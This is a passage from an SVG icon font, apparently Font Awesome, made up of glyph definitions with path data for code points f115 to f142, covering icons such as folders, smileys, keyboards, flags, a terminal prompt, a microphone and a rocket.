<glyph unicode="&#xf115;" horiz-adv-x="1920" d="M1781 605q0 35 -53 35h-1088q-40 0 -85.5 -21.5t-71.5 -52.5l-294 -363q-18 -24 -18 -40q0 -35 53 -35h1088q40 0 86 22t71 53l294 363q18 22 18 39zM640 768h768v160q0 40 -28 68t-68 28h-576q-40 0 -68 28t-28 68v64q0 40 -28 68t-68 28h-320q-40 0 -68 -28t-28 -68 v-853l256 315q44 53 116 87.5t140 34.5zM1909 605q0 -62 -46 -120l-295 -363q-43 -53 -116 -87.5t-140 -34.5h-1088q-92 0 -158 66t-66 158v960q0 92 66 158t158 66h320q92 0 158 -66t66 -158v-32h544q92 0 158 -66t66 -158v-160h192q54 0 99 -24.5t67 -70.5q15 -32 15 -68z " />
<glyph unicode="&#xf116;" horiz-adv-x="1792" />
<glyph unicode="&#xf117;" horiz-adv-x="1792" />
<glyph unicode="&#xf118;" d="M1134 461q-37 -121 -138 -195t-228 -74t-228 74t-138 195q-8 25 4 48.5t38 31.5q25 8 48.5 -4t31.5 -38q25 -80 92.5 -129.5t151.5 -49.5t151.5 49.5t92.5 129.5q8 26 32 38t49 4t37 -31.5t4 -48.5zM640 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5 t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1152 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1408 640q0 130 -51 248.5t-136.5 204t-204 136.5t-248.5 51t-248.5 -51t-204 -136.5t-136.5 -204t-51 -248.5 t51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5t136.5 204t51 248.5zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf119;" d="M1134 307q8 -25 -4 -48.5t-37 -31.5t-49 4t-32 38q-25 80 -92.5 129.5t-151.5 49.5t-151.5 -49.5t-92.5 -129.5q-8 -26 -31.5 -38t-48.5 -4q-26 8 -38 31.5t-4 48.5q37 121 138 195t228 74t228 -74t138 -195zM640 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5 t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1152 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1408 640q0 130 -51 248.5t-136.5 204t-204 136.5t-248.5 51t-248.5 -51t-204 -136.5t-136.5 -204 t-51 -248.5t51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5t136.5 204t51 248.5zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf11a;" d="M1152 448q0 -26 -19 -45t-45 -19h-640q-26 0 -45 19t-19 45t19 45t45 19h640q26 0 45 -19t19 -45zM640 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1152 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5 t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1408 640q0 130 -51 248.5t-136.5 204t-204 136.5t-248.5 51t-248.5 -51t-204 -136.5t-136.5 -204t-51 -248.5t51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5t136.5 204t51 248.5zM1536 640 q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf11b;" horiz-adv-x="1920" d="M832 448v128q0 14 -9 23t-23 9h-192v192q0 14 -9 23t-23 9h-128q-14 0 -23 -9t-9 -23v-192h-192q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h192v-192q0 -14 9 -23t23 -9h128q14 0 23 9t9 23v192h192q14 0 23 9t9 23zM1408 384q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5 t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1664 640q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1920 512q0 -212 -150 -362t-362 -150q-192 0 -338 128h-220q-146 -128 -338 -128q-212 0 -362 150 t-150 362t150 362t362 150h896q212 0 362 -150t150 -362z" />
<glyph unicode="&#xf11c;" horiz-adv-x="1920" d="M384 368v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM512 624v-96q0 -16 -16 -16h-224q-16 0 -16 16v96q0 16 16 16h224q16 0 16 -16zM384 880v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1408 368v-96q0 -16 -16 -16 h-864q-16 0 -16 16v96q0 16 16 16h864q16 0 16 -16zM768 624v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM640 880v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1024 624v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16 h96q16 0 16 -16zM896 880v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1280 624v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1664 368v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1152 880v-96 q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1408 880v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1664 880v-352q0 -16 -16 -16h-224q-16 0 -16 16v96q0 16 16 16h112v240q0 16 16 16h96q16 0 16 -16zM1792 128v896h-1664v-896 h1664zM1920 1024v-896q0 -53 -37.5 -90.5t-90.5 -37.5h-1664q-53 0 -90.5 37.5t-37.5 90.5v896q0 53 37.5 90.5t90.5 37.5h1664q53 0 90.5 -37.5t37.5 -90.5z" />
<glyph unicode="&#xf11d;" horiz-adv-x="1792" d="M1664 491v616q-169 -91 -306 -91q-82 0 -145 32q-100 49 -184 76.5t-178 27.5q-173 0 -403 -127v-599q245 113 433 113q55 0 103.5 -7.5t98 -26t77 -31t82.5 -39.5l28 -14q44 -22 101 -22q120 0 293 92zM320 1280q0 -35 -17.5 -64t-46.5 -46v-1266q0 -14 -9 -23t-23 -9 h-64q-14 0 -23 9t-9 23v1266q-29 17 -46.5 46t-17.5 64q0 53 37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1792 1216v-763q0 -39 -35 -57q-10 -5 -17 -9q-218 -116 -369 -116q-88 0 -158 35l-28 14q-64 33 -99 48t-91 29t-114 14q-102 0 -235.5 -44t-228.5 -102 q-15 -9 -33 -9q-16 0 -32 8q-32 19 -32 56v742q0 35 31 55q35 21 78.5 42.5t114 52t152.5 49.5t155 19q112 0 209 -31t209 -86q38 -19 89 -19q122 0 310 112q22 12 31 17q31 16 62 -2q31 -20 31 -55z" />
<glyph unicode="&#xf11e;" horiz-adv-x="1792" d="M832 536v192q-181 -16 -384 -117v-185q205 96 384 110zM832 954v197q-172 -8 -384 -126v-189q215 111 384 118zM1664 491v184q-235 -116 -384 -71v224q-20 6 -39 15q-5 3 -33 17t-34.5 17t-31.5 15t-34.5 15.5t-32.5 13t-36 12.5t-35 8.5t-39.5 7.5t-39.5 4t-44 2 q-23 0 -49 -3v-222h19q102 0 192.5 -29t197.5 -82q19 -9 39 -15v-188q42 -17 91 -17q120 0 293 92zM1664 918v189q-169 -91 -306 -91q-45 0 -78 8v-196q148 -42 384 90zM320 1280q0 -35 -17.5 -64t-46.5 -46v-1266q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v1266 q-29 17 -46.5 46t-17.5 64q0 53 37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1792 1216v-763q0 -39 -35 -57q-10 -5 -17 -9q-218 -116 -369 -116q-88 0 -158 35l-28 14q-64 33 -99 48t-91 29t-114 14q-102 0 -235.5 -44t-228.5 -102q-15 -9 -33 -9q-16 0 -32 8 q-32 19 -32 56v742q0 35 31 55q35 21 78.5 42.5t114 52t152.5 49.5t155 19q112 0 209 -31t209 -86q38 -19 89 -19q122 0 310 112q22 12 31 17q31 16 62 -2q31 -20 31 -55z" />
<glyph unicode="&#xf120;" horiz-adv-x="1664" d="M585 553l-466 -466q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l393 393l-393 393q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l466 -466q10 -10 10 -23t-10 -23zM1664 96v-64q0 -14 -9 -23t-23 -9h-960q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h960q14 0 23 -9 t9 -23z" />
<glyph unicode="&#xf121;" horiz-adv-x="1920" d="M617 137l-50 -50q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l50 -50q10 -10 10 -23t-10 -23l-393 -393l393 -393q10 -10 10 -23t-10 -23zM1208 1204l-373 -1291q-4 -13 -15.5 -19.5t-23.5 -2.5l-62 17q-13 4 -19.5 15.5t-2.5 24.5 l373 1291q4 13 15.5 19.5t23.5 2.5l62 -17q13 -4 19.5 -15.5t2.5 -24.5zM1865 553l-466 -466q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l393 393l-393 393q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l466 -466q10 -10 10 -23t-10 -23z" />
<glyph unicode="&#xf122;" horiz-adv-x="1792" d="M640 454v-70q0 -42 -39 -59q-13 -5 -25 -5q-27 0 -45 19l-512 512q-19 19 -19 45t19 45l512 512q29 31 70 14q39 -17 39 -59v-69l-397 -398q-19 -19 -19 -45t19 -45zM1792 416q0 -58 -17 -133.5t-38.5 -138t-48 -125t-40.5 -90.5l-20 -40q-8 -17 -28 -17q-6 0 -9 1 q-25 8 -23 34q43 400 -106 565q-64 71 -170.5 110.5t-267.5 52.5v-251q0 -42 -39 -59q-13 -5 -25 -5q-27 0 -45 19l-512 512q-19 19 -19 45t19 45l512 512q29 31 70 14q39 -17 39 -59v-262q411 -28 599 -221q169 -173 169 -509z" />
<glyph unicode="&#xf123;" horiz-adv-x="1664" d="M1186 579l257 250l-356 52l-66 10l-30 60l-159 322v-963l59 -31l318 -168l-60 355l-12 66zM1638 841l-363 -354l86 -500q5 -33 -6 -51.5t-34 -18.5q-17 0 -40 12l-449 236l-449 -236q-23 -12 -40 -12q-23 0 -34 18.5t-6 51.5l86 500l-364 354q-32 32 -23 59.5t54 34.5 l502 73l225 455q20 41 49 41q28 0 49 -41l225 -455l502 -73q45 -7 54 -34.5t-24 -59.5z" />
<glyph unicode="&#xf124;" horiz-adv-x="1408" d="M1401 1187l-640 -1280q-17 -35 -57 -35q-5 0 -15 2q-22 5 -35.5 22.5t-13.5 39.5v576h-576q-22 0 -39.5 13.5t-22.5 35.5t4 42t29 30l1280 640q13 7 29 7q27 0 45 -19q15 -14 18.5 -34.5t-6.5 -39.5z" />
<glyph unicode="&#xf125;" horiz-adv-x="1664" d="M557 256h595v595zM512 301l595 595h-595v-595zM1664 224v-192q0 -14 -9 -23t-23 -9h-224v-224q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v224h-864q-14 0 -23 9t-9 23v864h-224q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h224v224q0 14 9 23t23 9h192q14 0 23 -9t9 -23 v-224h851l246 247q10 9 23 9t23 -9q9 -10 9 -23t-9 -23l-247 -246v-851h224q14 0 23 -9t9 -23z" />
<glyph unicode="&#xf126;" horiz-adv-x="1024" d="M288 64q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM288 1216q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM928 1088q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM1024 1088q0 -52 -26 -96.5t-70 -69.5 q-2 -287 -226 -414q-68 -38 -203 -81q-128 -40 -169.5 -71t-41.5 -100v-26q44 -25 70 -69.5t26 -96.5q0 -80 -56 -136t-136 -56t-136 56t-56 136q0 52 26 96.5t70 69.5v820q-44 25 -70 69.5t-26 96.5q0 80 56 136t136 56t136 -56t56 -136q0 -52 -26 -96.5t-70 -69.5v-497 q54 26 154 57q55 17 87.5 29.5t70.5 31t59 39.5t40.5 51t28 69.5t8.5 91.5q-44 25 -70 69.5t-26 96.5q0 80 56 136t136 56t136 -56t56 -136z" />
<glyph unicode="&#xf127;" horiz-adv-x="1664" d="M439 265l-256 -256q-10 -9 -23 -9q-12 0 -23 9q-9 10 -9 23t9 23l256 256q10 9 23 9t23 -9q9 -10 9 -23t-9 -23zM608 224v-320q0 -14 -9 -23t-23 -9t-23 9t-9 23v320q0 14 9 23t23 9t23 -9t9 -23zM384 448q0 -14 -9 -23t-23 -9h-320q-14 0 -23 9t-9 23t9 23t23 9h320 q14 0 23 -9t9 -23zM1648 320q0 -120 -85 -203l-147 -146q-83 -83 -203 -83q-121 0 -204 85l-334 335q-21 21 -42 56l239 18l273 -274q27 -27 68 -27.5t68 26.5l147 146q28 28 28 67q0 40 -28 68l-274 275l18 239q35 -21 56 -42l336 -336q84 -86 84 -204zM1031 1044l-239 -18 l-273 274q-28 28 -68 28q-39 0 -68 -27l-147 -146q-28 -28 -28 -67q0 -40 28 -68l274 -274l-18 -240q-35 21 -56 42l-336 336q-84 86 -84 204q0 120 85 203l147 146q83 83 203 83q121 0 204 -85l334 -335q21 -21 42 -56zM1664 960q0 -14 -9 -23t-23 -9h-320q-14 0 -23 9 t-9 23t9 23t23 9h320q14 0 23 -9t9 -23zM1120 1504v-320q0 -14 -9 -23t-23 -9t-23 9t-9 23v320q0 14 9 23t23 9t23 -9t9 -23zM1527 1353l-256 -256q-11 -9 -23 -9t-23 9q-9 10 -9 23t9 23l256 256q10 9 23 9t23 -9q9 -10 9 -23t-9 -23z" />
<glyph unicode="&#xf128;" horiz-adv-x="1024" d="M704 280v-240q0 -16 -12 -28t-28 -12h-240q-16 0 -28 12t-12 28v240q0 16 12 28t28 12h240q16 0 28 -12t12 -28zM1020 880q0 -54 -15.5 -101t-35 -76.5t-55 -59.5t-57.5 -43.5t-61 -35.5q-41 -23 -68.5 -65t-27.5 -67q0 -17 -12 -32.5t-28 -15.5h-240q-15 0 -25.5 18.5 t-10.5 37.5v45q0 83 65 156.5t143 108.5q59 27 84 56t25 76q0 42 -46.5 74t-107.5 32q-65 0 -108 -29q-35 -25 -107 -115q-13 -16 -31 -16q-12 0 -25 8l-164 125q-13 10 -15.5 25t5.5 28q160 266 464 266q80 0 161 -31t146 -83t106 -127.5t41 -158.5z" />
<glyph unicode="&#xf129;" horiz-adv-x="640" d="M640 192v-128q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h64v384h-64q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h384q26 0 45 -19t19 -45v-576h64q26 0 45 -19t19 -45zM512 1344v-192q0 -26 -19 -45t-45 -19h-256q-26 0 -45 19t-19 45v192 q0 26 19 45t45 19h256q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf12a;" horiz-adv-x="640" d="M512 288v-224q0 -26 -19 -45t-45 -19h-256q-26 0 -45 19t-19 45v224q0 26 19 45t45 19h256q26 0 45 -19t19 -45zM542 1344l-28 -768q-1 -26 -20.5 -45t-45.5 -19h-256q-26 0 -45.5 19t-20.5 45l-28 768q-1 26 17.5 45t44.5 19h320q26 0 44.5 -19t17.5 -45z" />
<glyph unicode="&#xf12b;" d="M897 167v-167h-248l-159 252l-24 42q-8 9 -11 21h-3l-9 -21q-10 -20 -25 -44l-155 -250h-258v167h128l197 291l-185 272h-137v168h276l139 -228q2 -4 23 -42q8 -9 11 -21h3q3 9 11 21l25 42l140 228h257v-168h-125l-184 -267l204 -296h109zM1534 846v-206h-514l-3 27 q-4 28 -4 46q0 64 26 117t65 86.5t84 65t84 54.5t65 54t26 64q0 38 -29.5 62.5t-70.5 24.5q-51 0 -97 -39q-14 -11 -36 -38l-105 92q26 37 63 66q83 65 188 65q110 0 178 -59.5t68 -158.5q0 -56 -24.5 -103t-62 -76.5t-81.5 -58.5t-82 -50.5t-65.5 -51.5t-30.5 -63h232v80 h126z" />
<glyph unicode="&#xf12c;" d="M897 167v-167h-248l-159 252l-24 42q-8 9 -11 21h-3l-9 -21q-10 -20 -25 -44l-155 -250h-258v167h128l197 291l-185 272h-137v168h276l139 -228q2 -4 23 -42q8 -9 11 -21h3q3 9 11 21l25 42l140 228h257v-168h-125l-184 -267l204 -296h109zM1536 -50v-206h-514l-4 27 q-3 45 -3 46q0 64 26 117t65 86.5t84 65t84 54.5t65 54t26 64q0 38 -29.5 62.5t-70.5 24.5q-51 0 -97 -39q-14 -11 -36 -38l-105 92q26 37 63 66q80 65 188 65q110 0 178 -59.5t68 -158.5q0 -66 -34.5 -118.5t-84 -86t-99.5 -62.5t-87 -63t-41 -73h232v80h126z" />
<glyph unicode="&#xf12d;" horiz-adv-x="1920" d="M896 128l336 384h-768l-336 -384h768zM1909 1205q15 -34 9.5 -71.5t-30.5 -65.5l-896 -1024q-38 -44 -96 -44h-768q-38 0 -69.5 20.5t-47.5 54.5q-15 34 -9.5 71.5t30.5 65.5l896 1024q38 44 96 44h768q38 0 69.5 -20.5t47.5 -54.5z" />
<glyph unicode="&#xf12e;" horiz-adv-x="1664" d="M1664 438q0 -81 -44.5 -135t-123.5 -54q-41 0 -77.5 17.5t-59 38t-56.5 38t-71 17.5q-110 0 -110 -124q0 -39 16 -115t15 -115v-5q-22 0 -33 -1q-34 -3 -97.5 -11.5t-115.5 -13.5t-98 -5q-61 0 -103 26.5t-42 83.5q0 37 17.5 71t38 56.5t38 59t17.5 77.5q0 79 -54 123.5 t-135 44.5q-84 0 -143 -45.5t-59 -127.5q0 -43 15 -83t33.5 -64.5t33.5 -53t15 -50.5q0 -45 -46 -89q-37 -35 -117 -35q-95 0 -245 24q-9 2 -27.5 4t-27.5 4l-13 2q-1 0 -3 1q-2 0 -2 1v1024q2 -1 17.5 -3.5t34 -5t21.5 -3.5q150 -24 245 -24q80 0 117 35q46 44 46 89 q0 22 -15 50.5t-33.5 53t-33.5 64.5t-15 83q0 82 59 127.5t144 45.5q80 0 134 -44.5t54 -123.5q0 -41 -17.5 -77.5t-38 -59t-38 -56.5t-17.5 -71q0 -57 42 -83.5t103 -26.5q64 0 180 15t163 17v-2q-1 -2 -3.5 -17.5t-5 -34t-3.5 -21.5q-24 -150 -24 -245q0 -80 35 -117 q44 -46 89 -46q22 0 50.5 15t53 33.5t64.5 33.5t83 15q82 0 127.5 -59t45.5 -143z" />
<glyph unicode="&#xf130;" horiz-adv-x="1152" d="M1152 832v-128q0 -221 -147.5 -384.5t-364.5 -187.5v-132h256q26 0 45 -19t19 -45t-19 -45t-45 -19h-640q-26 0 -45 19t-19 45t19 45t45 19h256v132q-217 24 -364.5 187.5t-147.5 384.5v128q0 26 19 45t45 19t45 -19t19 -45v-128q0 -185 131.5 -316.5t316.5 -131.5 t316.5 131.5t131.5 316.5v128q0 26 19 45t45 19t45 -19t19 -45zM896 1216v-512q0 -132 -94 -226t-226 -94t-226 94t-94 226v512q0 132 94 226t226 94t226 -94t94 -226z" />
<glyph unicode="&#xf131;" horiz-adv-x="1408" d="M271 591l-101 -101q-42 103 -42 214v128q0 26 19 45t45 19t45 -19t19 -45v-128q0 -53 15 -113zM1385 1193l-361 -361v-128q0 -132 -94 -226t-226 -94q-55 0 -109 19l-96 -96q97 -51 205 -51q185 0 316.5 131.5t131.5 316.5v128q0 26 19 45t45 19t45 -19t19 -45v-128 q0 -221 -147.5 -384.5t-364.5 -187.5v-132h256q26 0 45 -19t19 -45t-19 -45t-45 -19h-640q-26 0 -45 19t-19 45t19 45t45 19h256v132q-125 13 -235 81l-254 -254q-10 -10 -23 -10t-23 10l-82 82q-10 10 -10 23t10 23l1234 1234q10 10 23 10t23 -10l82 -82q10 -10 10 -23 t-10 -23zM1005 1325l-621 -621v512q0 132 94 226t226 94q102 0 184.5 -59t116.5 -152z" />
<glyph unicode="&#xf132;" horiz-adv-x="1280" d="M1088 576v640h-448v-1137q119 63 213 137q235 184 235 360zM1280 1344v-768q0 -86 -33.5 -170.5t-83 -150t-118 -127.5t-126.5 -103t-121 -77.5t-89.5 -49.5t-42.5 -20q-12 -6 -26 -6t-26 6q-16 7 -42.5 20t-89.5 49.5t-121 77.5t-126.5 103t-118 127.5t-83 150 t-33.5 170.5v768q0 26 19 45t45 19h1152q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf133;" horiz-adv-x="1664" d="M128 -128h1408v1024h-1408v-1024zM512 1088v288q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-288q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1280 1088v288q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-288q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1664 1152v-1280 q0 -52 -38 -90t-90 -38h-1408q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h128v96q0 66 47 113t113 47h64q66 0 113 -47t47 -113v-96h384v96q0 66 47 113t113 47h64q66 0 113 -47t47 -113v-96h128q52 0 90 -38t38 -90z" />
<glyph unicode="&#xf134;" horiz-adv-x="1408" d="M512 1344q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1408 1376v-320q0 -16 -12 -25q-8 -7 -20 -7q-4 0 -7 1l-448 96q-11 2 -18 11t-7 20h-256v-102q111 -23 183.5 -111t72.5 -203v-800q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19t-19 45v800 q0 106 62.5 190.5t161.5 114.5v111h-32q-59 0 -115 -23.5t-91.5 -53t-66 -66.5t-40.5 -53.5t-14 -24.5q-17 -35 -57 -35q-16 0 -29 7q-23 12 -31.5 37t3.5 49q5 10 14.5 26t37.5 53.5t60.5 70t85 67t108.5 52.5q-25 42 -25 86q0 66 47 113t113 47t113 -47t47 -113 q0 -33 -14 -64h302q0 11 7 20t18 11l448 96q3 1 7 1q12 0 20 -7q12 -9 12 -25z" />
<glyph unicode="&#xf135;" horiz-adv-x="1664" d="M1440 1088q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM1664 1376q0 -249 -75.5 -430.5t-253.5 -360.5q-81 -80 -195 -176l-20 -379q-2 -16 -16 -26l-384 -224q-7 -4 -16 -4q-12 0 -23 9l-64 64q-13 14 -8 32l85 276l-281 281l-276 -85q-3 -1 -9 -1 q-14 0 -23 9l-64 64q-17 19 -5 39l224 384q10 14 26 16l379 20q96 114 176 195q188 187 358 258t431 71q14 0 24 -9.5t10 -22.5z" />
<glyph unicode="&#xf136;" horiz-adv-x="1792" d="M1745 763l-164 -763h-334l178 832q13 56 -15 88q-27 33 -83 33h-169l-204 -953h-334l204 953h-286l-204 -953h-334l204 953l-153 327h1276q101 0 189.5 -40.5t147.5 -113.5q60 -73 81 -168.5t0 -194.5z" />
<glyph unicode="&#xf137;" d="M909 141l102 102q19 19 19 45t-19 45l-307 307l307 307q19 19 19 45t-19 45l-102 102q-19 19 -45 19t-45 -19l-454 -454q-19 -19 -19 -45t19 -45l454 -454q19 -19 45 -19t45 19zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5 t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf138;" d="M717 141l454 454q19 19 19 45t-19 45l-454 454q-19 19 -45 19t-45 -19l-102 -102q-19 -19 -19 -45t19 -45l307 -307l-307 -307q-19 -19 -19 -45t19 -45l102 -102q19 -19 45 -19t45 19zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5 t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf139;" d="M1165 397l102 102q19 19 19 45t-19 45l-454 454q-19 19 -45 19t-45 -19l-454 -454q-19 -19 -19 -45t19 -45l102 -102q19 -19 45 -19t45 19l307 307l307 -307q19 -19 45 -19t45 19zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5 t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf13a;" d="M813 237l454 454q19 19 19 45t-19 45l-102 102q-19 19 -45 19t-45 -19l-307 -307l-307 307q-19 19 -45 19t-45 -19l-102 -102q-19 -19 -19 -45t19 -45l454 -454q19 -19 45 -19t45 19zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5 t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf13b;" horiz-adv-x="1408" d="M1130 939l16 175h-884l47 -534h612l-22 -228l-197 -53l-196 53l-13 140h-175l22 -278l362 -100h4v1l359 99l50 544h-644l-15 181h674zM0 1408h1408l-128 -1438l-578 -162l-574 162z" />
<glyph unicode="&#xf13c;" horiz-adv-x="1792" d="M275 1408h1505l-266 -1333l-804 -267l-698 267l71 356h297l-29 -147l422 -161l486 161l68 339h-1208l58 297h1209l38 191h-1208z" />
<glyph unicode="&#xf13d;" horiz-adv-x="1792" d="M960 1280q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1792 352v-352q0 -22 -20 -30q-8 -2 -12 -2q-13 0 -23 9l-93 93q-119 -143 -318.5 -226.5t-429.5 -83.5t-429.5 83.5t-318.5 226.5l-93 -93q-9 -9 -23 -9q-4 0 -12 2q-20 8 -20 30v352 q0 14 9 23t23 9h352q22 0 30 -20q8 -19 -7 -35l-100 -100q67 -91 189.5 -153.5t271.5 -82.5v647h-192q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h192v163q-58 34 -93 92.5t-35 128.5q0 106 75 181t181 75t181 -75t75 -181q0 -70 -35 -128.5t-93 -92.5v-163h192q26 0 45 -19 t19 -45v-128q0 -26 -19 -45t-45 -19h-192v-647q149 20 271.5 82.5t189.5 153.5l-100 100q-15 16 -7 35q8 20 30 20h352q14 0 23 -9t9 -23z" />
<glyph unicode="&#xf13e;" horiz-adv-x="1152" d="M1056 768q40 0 68 -28t28 -68v-576q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v576q0 40 28 68t68 28h32v320q0 185 131.5 316.5t316.5 131.5t316.5 -131.5t131.5 -316.5q0 -26 -19 -45t-45 -19h-64q-26 0 -45 19t-19 45q0 106 -75 181t-181 75t-181 -75t-75 -181 v-320h736z" />
<glyph unicode="&#xf140;" d="M1024 640q0 -106 -75 -181t-181 -75t-181 75t-75 181t75 181t181 75t181 -75t75 -181zM1152 640q0 159 -112.5 271.5t-271.5 112.5t-271.5 -112.5t-112.5 -271.5t112.5 -271.5t271.5 -112.5t271.5 112.5t112.5 271.5zM1280 640q0 -212 -150 -362t-362 -150t-362 150 t-150 362t150 362t362 150t362 -150t150 -362zM1408 640q0 130 -51 248.5t-136.5 204t-204 136.5t-248.5 51t-248.5 -51t-204 -136.5t-136.5 -204t-51 -248.5t51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5t136.5 204t51 248.5zM1536 640 q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf141;" horiz-adv-x="1408" d="M384 800v-192q0 -40 -28 -68t-68 -28h-192q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68zM896 800v-192q0 -40 -28 -68t-68 -28h-192q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68zM1408 800v-192q0 -40 -28 -68t-68 -28h-192 q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68z" />
<glyph unicode="&#xf142;" horiz-adv-x="384" d="M384 288v-192q0 -40 -28 -68t-68 -28h-192q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68zM384 800v-192q0 -40 -28 -68t-68 -28h-192q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68zM384 1312v-192q0 -40 -28 -68t-68 -28h-192 q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68z" />
